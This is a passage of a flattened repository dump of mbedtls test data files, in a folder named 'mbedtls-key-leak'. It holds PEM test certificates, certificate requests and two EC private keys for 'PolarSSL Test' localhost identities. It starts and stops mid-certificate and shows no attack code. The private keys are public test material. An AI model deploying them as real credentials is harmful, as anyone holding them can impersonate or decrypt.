CCqGSM49BAMBA2kAMGYCMQCj0EyFUzDRmfokWzLVEWN0epR4/sZytfIeozp6BqWH 12 | qaTBdAR2vthIKC7dKuUkg34CMQD6YtB2O9Vso79gbzSen2qh7gK7VvGE+31EVPbR 13 | Ce/oNG/3OfhRSdn3FOvBBg2UErM= 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5-sha384.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICHzCCAaWgAwIBAgIBFDAKBggqhkjOPQQDAzA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTMwOTI0MTYyMTI3WhcNMjMwOTIyMTYyMTI3WjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jgZ0wgZowCQYDVR0TBAIwADAd 8 | BgNVHQ4EFgQUUGGlj9QH2deCAQzlZX+MY0anE74wbgYDVR0jBGcwZYAUnW0gJEkB 9 | PyvLeLUZvH4kydv7NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xh 10 | clNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAoG 11 | CCqGSM49BAMDA2gAMGUCMQCnsd/6VB2kLIqMRsWdkJvRaQROyAg78CQExFEY3CMv 12 | 9t0kWRXPc4nCMH69RjQVvC4CMB4lk9A7hnX2zQy3bbUhOCOvXcsQdEe8AMgJBviz 13 | 5Nob2wThRqsm1wjCF60fyzXWuA== 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5-sha512.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICHzCCAaWgAwIBAgIBFTAKBggqhkjOPQQDBDA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTMwOTI0MTYyMTI3WhcNMjMwOTIyMTYyMTI3WjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jgZ0wgZowCQYDVR0TBAIwADAd 8 | BgNVHQ4EFgQUUGGlj9QH2deCAQzlZX+MY0anE74wbgYDVR0jBGcwZYAUnW0gJEkB 9 | PyvLeLUZvH4kydv7NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xh 10 | clNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAoG 11 | CCqGSM49BAMEA2gAMGUCMFPL2OI8arcbRlKAbRb/YfGibo4Mwts8KX3fOuRCbXEn 12 | pDWeb82kBqfXwzPJwamFOwIxAPGzyhWrxn0qEynWV5nzFK02PYBnYFgClISyyudH 13 | HJGHtbEVRc5JA8ALnggaLVpuvg== 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICHzCCAaWgAwIBAgIBCTAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTMwOTI0MTU1MjA0WhcNMjMwOTIyMTU1MjA0WjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jgZ0wgZowCQYDVR0TBAIwADAd 8 | BgNVHQ4EFgQUUGGlj9QH2deCAQzlZX+MY0anE74wbgYDVR0jBGcwZYAUnW0gJEkB 9 | PyvLeLUZvH4kydv7NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xh 10 | clNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAoG 11 | CCqGSM49BAMCA2gAMGUCMQCaLFzXptui5WQN8LlO3ddh1hMxx6tzgLvT03MTVK2S 12 | C12r0Lz3ri/moSEpNZWqPjkCMCE2f53GXcYLqyfyJR078c/xNSUU5+Xxl7VZ414V 13 | fGa5kHvHARBPc8YAIVIqDvHH1Q== 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.eku-cli.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIB5DCCAWmgAwIBAgIBPDAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTQwNDEwMTcyMTIxWhcNMjQwNDA3MTcyMTIxWjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jYjBgMAkGA1UdEwQCMAAwHQYD 8 | VR0OBBYEFFBhpY/UB9nXggEM5WV/jGNGpxO+MB8GA1UdIwQYMBaAFJ1tICRJAT8r 9 | y3i1Gbx+JMnb+zZ8MBMGA1UdJQQMMAoGCCsGAQUFBwMCMAoGCCqGSM49BAMCA2kA 10 | MGYCMQCzHyEvd56zm1AzfDBi3psz3rDL/m0RN2WnbRBQJxIJqjwEXOrKazko9m9q 11 | owgau88CMQDuI0fsq5tnyiHPaDSAE21/6hlrCR6deNbwzB94OuPIbx1wIas9D1jc 12 | //iSmKtbl8Y= 13 | -----END CERTIFICATE----- 14 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.eku-cs.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIB4zCCAWmgAwIBAgIBOjAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTQwNDEwMTcyMDQxWhcNMjQwNDA3MTcyMDQxWjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jYjBgMAkGA1UdEwQCMAAwHQYD 8 | VR0OBBYEFFBhpY/UB9nXggEM5WV/jGNGpxO+MB8GA1UdIwQYMBaAFJ1tICRJAT8r 9 | y3i1Gbx+JMnb+zZ8MBMGA1UdJQQMMAoGCCsGAQUFBwMDMAoGCCqGSM49BAMCA2gA 10 | MGUCMQC294oVK6fUjH/abI1xzytTusi8dl7518L0Y19q8zi9K19OtxzPK09h7xyy 11 | gaJRvpUCMFS6hYhrht38yqwwhSVlnmTMVtira58mEUhL6v7Qzw1sz/Dm4aXkW3s6 12 | JQV1kqqbRw== 13 | -----END CERTIFICATE----- 14 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.eku-cs_any.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIB6TCCAW+gAwIBAgIBOzAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTQwNDEwMTcyMDU4WhcNMjQwNDA3MTcyMDU4WjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jaDBmMAkGA1UdEwQCMAAwHQYD 8 | VR0OBBYEFFBhpY/UB9nXggEM5WV/jGNGpxO+MB8GA1UdIwQYMBaAFJ1tICRJAT8r 9 | y3i1Gbx+JMnb+zZ8MBkGA1UdJQQSMBAGCCsGAQUFBwMDBgRVHSUAMAoGCCqGSM49 10 | BAMCA2gAMGUCMQCSYaq/9IKOTkzIrU/eOtpha/3af3JwT6vKh4N3cSX62ksMz0GT 11 | Uxmq4UGMBt4VmBkCMBGpYqof6hS1o92ltNRpDSHuVQ+nke1lOsoQ1plZp4SI+bY1 12 | bUD/WrUSLlwikZAeng== 13 | -----END CERTIFICATE----- 14 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.eku-srv.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIB5DCCAWmgAwIBAgIBPjAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTQwNDEwMTcyMTU0WhcNMjQwNDA3MTcyMTU0WjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jYjBgMAkGA1UdEwQCMAAwHQYD 8 | VR0OBBYEFFBhpY/UB9nXggEM5WV/jGNGpxO+MB8GA1UdIwQYMBaAFJ1tICRJAT8r 9 | y3i1Gbx+JMnb+zZ8MBMGA1UdJQQMMAoGCCsGAQUFBwMBMAoGCCqGSM49BAMCA2kA 10 | MGYCMQDQzjWB0xZs/8IsqJb7owYYtCiT17939Uuc/1yBF69pJRy7KV/qJlHNvlVu 11 | qwWVTx0CMQDNW/0dlX1gU6ashrZv5Ly4sijg/g645fFpfMKCNXysEb9xiBeEj5de 12 | 2x5sX/0OSx4= 13 | -----END CERTIFICATE----- 14 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.eku-srv_cli.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIB7DCCAXOgAwIBAgIBPTAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTQwNDEwMTcyMTQyWhcNMjQwNDA3MTcyMTQyWjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jbDBqMAkGA1UdEwQCMAAwHQYD 8 | VR0OBBYEFFBhpY/UB9nXggEM5WV/jGNGpxO+MB8GA1UdIwQYMBaAFJ1tICRJAT8r 9 | y3i1Gbx+JMnb+zZ8MB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAKBggq 10 | hkjOPQQDAgNnADBkAjAmQjJxxC82ZhBpH/GQkOQXDmaaV/JHRHGok1cWn3j3Xj8A 11 | fqRZkp8JihpGIMse208CMFCMdNAfNd1tv+oPuynoK5Oh6/YlASX/otJT68voEIAN 12 | SmsT1m9VPQMIyUo/3RtYjg== 13 | -----END CERTIFICATE----- 14 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.key: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MHcCAQEEIPEqEyB2AnCoPL/9U/YDHvdqXYbIogTywwyp6/UfDw6noAoGCCqGSM49 3 | AwEHoUQDQgAEN8xW2XYJHlpyPsdZLf8gbu58+QaRdNCtFLX3aCJZYpJO5QDYIxH/ 4 | 6i/SNF1dFr2KiMJrdw1VzYoqDvoByLTt/w== 5 | -----END EC PRIVATE KEY----- 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.ku-ds.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICLTCCAbKgAwIBAgIBLTAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTQwNDA5MDg0ODM1WhcNMjQwNDA2MDg0ODM1WjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jgaowgacwCQYDVR0TBAIwADAd 8 | BgNVHQ4EFgQUUGGlj9QH2deCAQzlZX+MY0anE74wbgYDVR0jBGcwZYAUnW0gJEkB 9 | PyvLeLUZvH4kydv7NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xh 10 | clNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAsG 11 | A1UdDwQEAwIHgDAKBggqhkjOPQQDAgNpADBmAjEAzp4DkFMq7eDB0x5FeS9gYDaG 12 | Ol8rVnWlRTLQzHZBQjKp+TcBdHZaBPoi8LyXtWA4AjEA6OWhsuTcv/qXOscQT0rL 13 | eEh8wcCQeJK1uNd78lNvx3W0Pcxdb6cd7AhaAKgXL+r4 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.ku-ka.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICKzCCAbKgAwIBAgIBLjAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTQwNDA5MDg0ODUwWhcNMjQwNDA2MDg0ODUwWjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jgaowgacwCQYDVR0TBAIwADAd 8 | BgNVHQ4EFgQUUGGlj9QH2deCAQzlZX+MY0anE74wbgYDVR0jBGcwZYAUnW0gJEkB 9 | PyvLeLUZvH4kydv7NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xh 10 | clNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAsG 11 | A1UdDwQEAwIDCDAKBggqhkjOPQQDAgNnADBkAjACzKQ88/NvngMQBFc9rC484+gO 12 | BRkXP28BqRcj8sBt3EfmEGH23BuhkZuB1OFZuMICMC4/pHgbOQtaY9WZPUROUVVZ 13 | OuO6XsVbhiE0rb/mumqmUwuOrCtC/KFdvFZol4BNGA== 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.ku-ke.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICKzCCAbKgAwIBAgIBLzAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTQwNDA5MDg0OTA0WhcNMjQwNDA2MDg0OTA0WjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABDfMVtl2CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA 7 | 2CMR/+ov0jRdXRa9iojCa3cNVc2KKg76Aci07f+jgaowgacwCQYDVR0TBAIwADAd 8 | BgNVHQ4EFgQUUGGlj9QH2deCAQzlZX+MY0anE74wbgYDVR0jBGcwZYAUnW0gJEkB 9 | PyvLeLUZvH4kydv7NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xh 10 | clNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAsG 11 | A1UdDwQEAwIFIDAKBggqhkjOPQQDAgNnADBkAjAMl0Cjv9f45bHeJTul5XpYeJeT 12 | 52ZaOLTa/uTLy948EnEIi6sj3nFb9fvsUbsOOjECMAXAMY64KOqzixefz3y3XS/d 13 | 9miyeArPOmXU2JJ3LGuNbqqj9IbABawB1OD8v8gRmg== 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.req.ku.sha1: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBFjCBvAIBADA8MQswCQYDVQQGEwJOTDERMA8GA1UEChMIUG9sYXJTU0wxGjAY 3 | BgNVBAMTEVBvbGFyU1NMIFNlcnZlciAxMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcD 4 | QgAEN8xW2XYJHlpyPsdZLf8gbu58+QaRdNCtFLX3aCJZYpJO5QDYIxH/6i/SNF1d 5 | Fr2KiMJrdw1VzYoqDvoByLTt/6AeMBwGCSqGSIb3DQEJDjEPMA0wCwYDVR0PBAQD 6 | AgHAMAsGByqGSM49BAEFAANIADBFAiBjnnD7nwsFnCL+MpPPFJE3K/Tgj+5rAgXj 7 | e5UejDX2CAIhAKdbigWJL/ZatvG9CFHq7ykrRns2x8JEXehWu8DsXdx9 8 | -----END CERTIFICATE REQUEST----- 9 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.req.sha1: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBGDCBvwIBADA0MQswCQYDVQQGEwJOTDERMA8GA1UEChMIUG9sYXJTU0wxEjAQ 3 | BgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABDfMVtl2 4 | CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA2CMR/+ov0jRdXRa9iojCa3cN 5 | Vc2KKg76Aci07f+gKTAnBgkqhkiG9w0BCQ4xGjAYMAkGA1UdEwQCMAAwCwYDVR0P 6 | BAQDAgXgMAkGByqGSM49BAEDSQAwRgIhALSf2Mj3er+ocZCN++aEoIp5PQ9JCkPY 7 | b88ghuTyS7DCAiEA+CnVzNN0I2kpnmKUOUcXxLcjoPaLROgxtubDvKv5ckM= 8 | -----END CERTIFICATE REQUEST----- 9 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.req.sha224: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBGDCBvwIBADA0MQswCQYDVQQGEwJOTDERMA8GA1UEChMIUG9sYXJTU0wxEjAQ 3 | BgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABDfMVtl2 4 | CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA2CMR/+ov0jRdXRa9iojCa3cN 5 | Vc2KKg76Aci07f+gKTAnBgkqhkiG9w0BCQ4xGjAYMAkGA1UdEwQCMAAwCwYDVR0P 6 | BAQDAgXgMAoGCCqGSM49BAMBA0gAMEUCIDYaN1m9MRk5mhX1U8aZKd0alyGKWqcR 7 | oglF2MsIii/2AiEAjFHs8XQ0Q4yDF8oLztCxlq3nAvqmPdQz9T+TkEfh+PA= 8 | -----END CERTIFICATE REQUEST----- 9 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.req.sha256: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBFzCBvwIBADA0MQswCQYDVQQGEwJOTDERMA8GA1UEChMIUG9sYXJTU0wxEjAQ 3 | BgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABDfMVtl2 4 | CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA2CMR/+ov0jRdXRa9iojCa3cN 5 | Vc2KKg76Aci07f+gKTAnBgkqhkiG9w0BCQ4xGjAYMAkGA1UdEwQCMAAwCwYDVR0P 6 | BAQDAgXgMAoGCCqGSM49BAMCA0cAMEQCIGmRFdjjd53oM2Zpt3E5vfqujnA+DHWk 7 | s9OudcSWBdjmAiA7BAYjGnXyL6ATPqM7qnLVGTf3JMT+1rXl7esBm/0APA== 8 | -----END CERTIFICATE REQUEST----- 9 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.req.sha384: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBFzCBvwIBADA0MQswCQYDVQQGEwJOTDERMA8GA1UEChMIUG9sYXJTU0wxEjAQ 3 | BgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABDfMVtl2 4 | CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA2CMR/+ov0jRdXRa9iojCa3cN 5 | Vc2KKg76Aci07f+gKTAnBgkqhkiG9w0BCQ4xGjAYMAkGA1UdEwQCMAAwCwYDVR0P 6 | BAQDAgXgMAoGCCqGSM49BAMDA0cAMEQCIDnO+PIPZJGqiky9unvq13uXxahw1bpk 7 | Zb5NRV0c06Q5AiAo5B49tp3kDN/n0BDNt1BBGLUfhcU+Qn2SQenCyfuGLg== 8 | -----END CERTIFICATE REQUEST----- 9 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server5.req.sha512: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIIBGDCBvwIBADA0MQswCQYDVQQGEwJOTDERMA8GA1UEChMIUG9sYXJTU0wxEjAQ 3 | BgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABDfMVtl2 4 | CR5acj7HWS3/IG7ufPkGkXTQrRS192giWWKSTuUA2CMR/+ov0jRdXRa9iojCa3cN 5 | Vc2KKg76Aci07f+gKTAnBgkqhkiG9w0BCQ4xGjAYMAkGA1UdEwQCMAAwCwYDVR0P 6 | BAQDAgXgMAoGCCqGSM49BAMEA0gAMEUCIQD8xdtluTiBJM50d/WvDeUvPbXOUMlL 7 | 8xEJXU2WOK+RLAIgS8U6Z8tlJpXLEisz/j4gdABG3Y3h4PBJjlpszFisTNo= 8 | -----END CERTIFICATE REQUEST----- 9 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server6-ss-child.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIB8jCCAZmgAwIBAgIMU6LLWCI5lHSn7HnsMAoGCCqGSM49BAMCMEcxEzARBgNV 3 | BAMTCnNlbGZzaWduZWQxEDAOBgNVBAsTB3Rlc3RpbmcxETAPBgNVBAoTCFBvbGFy 4 | U1NMMQswCQYDVQQGEwJOTDAiGA8yMDE0MDYxOTExMzY1NloYDzIwMjQwNjE4MTEz 5 | NjU2WjBNMRkwFwYDVQQDExBzZWxmc2lnbmVkLWNoaWxkMRAwDgYDVQQLEwd0ZXN0 6 | aW5nMREwDwYDVQQKEwhQb2xhclNTTDELMAkGA1UEBhMCTkwwWTATBgcqhkjOPQIB 7 | BggqhkjOPQMBBwNCAASBWTF2SST6Fa2roDFuDu0zEfqRJVXBsMGcA3I+mLotpHI3 8 | iR9DN40fjjrY8FfoL0/JAKT323MPssYElNFAOzjjo2EwXzAMBgNVHRMBAf8EAjAA 9 | MA8GA1UdDwEB/wQFAwMHgAAwHQYDVR0OBBYEFDxZrEo+LvwCNi/afcvLnHqyiZlT 10 | MB8GA1UdIwQYMBaAFLZtURgXjmWq8uzV8wHkbFLCNB1bMAoGCCqGSM49BAMCA0cA 11 | MEQCIAMlQ59/NW7S0hP1cu5OTD2zqT087bEmnIfOTBYfj8UFAiBBrrz2dipODVYx 12 | vvTsQmSCzjrm+JtQQoWa+cdnAG3w5g== 13 | -----END CERTIFICATE----- 14 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server6.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIICIDCCAaWgAwIBAgIBCjAKBggqhkjOPQQDAjA+MQswCQYDVQQGEwJOTDERMA8G 3 | A1UEChMIUG9sYXJTU0wxHDAaBgNVBAMTE1BvbGFyc3NsIFRlc3QgRUMgQ0EwHhcN 4 | MTMwOTI0MTU1MjA0WhcNMjMwOTIyMTU1MjA0WjA0MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxEjAQBgNVBAMTCWxvY2FsaG9zdDBZMBMGByqGSM49AgEG 6 | CCqGSM49AwEHA0IABIFZMXZJJPoVraugMW4O7TMR+pElVcGwwZwDcj6Yui2kcjeJ 7 | H0M3jR+OOtjwV+gvT8kApPfbcw+yxgSU0UA7OOOjgZ0wgZowCQYDVR0TBAIwADAd 8 | BgNVHQ4EFgQUfmWPPjMDFOXhvmCy4IV/jOdgK3swbgYDVR0jBGcwZYAUnW0gJEkB 9 | PyvLeLUZvH4kydv7NnyhQqRAMD4xCzAJBgNVBAYTAk5MMREwDwYDVQQKEwhQb2xh 10 | clNTTDEcMBoGA1UEAxMTUG9sYXJzc2wgVGVzdCBFQyBDQYIJAMFD4n5iQ8zoMAoG 11 | CCqGSM49BAMCA2kAMGYCMQCsYTyleBFuI4nizuxo/ie5dxJnD0ynwCnRJ+84PZP4 12 | AQA3HdUz0qNYs4CZ2am9Gz0CMQDr2TNLFA3C3S3pmgXMT0eKzR1Ca1/Nulf0llQZ 13 | Xj09kLboxuemP40IIqhQnpYptMg= 14 | -----END CERTIFICATE----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server6.key: -------------------------------------------------------------------------------- 1 | -----BEGIN EC PRIVATE KEY----- 2 | MHcCAQEEIEQZG5j8IkRLxa9OoZJzD3KkrXqIgi9cHZMVv2s/VcPOoAoGCCqGSM49 3 | AwEHoUQDQgAEgVkxdkkk+hWtq6Axbg7tMxH6kSVVwbDBnANyPpi6LaRyN4kfQzeN 4 | H4462PBX6C9PyQCk99tzD7LGBJTRQDs44w== 5 | -----END EC PRIVATE KEY----- 6 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server7.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDwjCCAaqgAwIBAgIBEDANBgkqhkiG9w0BAQsFADBIMQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxJjAkBgNVBAMTHVBvbGFyU1NMIFRlc3QgSW50ZXJt 4 | ZWRpYXRlIENBMB4XDTEzMDkyNDE2MTIyNFoXDTIzMDkyMjE2MTIyNFowNDELMAkG 5 | A1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRIwEAYDVQQDEwlsb2NhbGhvc3Qw 6 | WTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAAQcbffp2qXqoZyychmoCRxzrd4Vu96m 7 | 47NPBehtEC46aTeXgDnBdf++znABrAtfXBRNQz8ARIeYBmskr22rlKjyo4GVMIGS 8 | 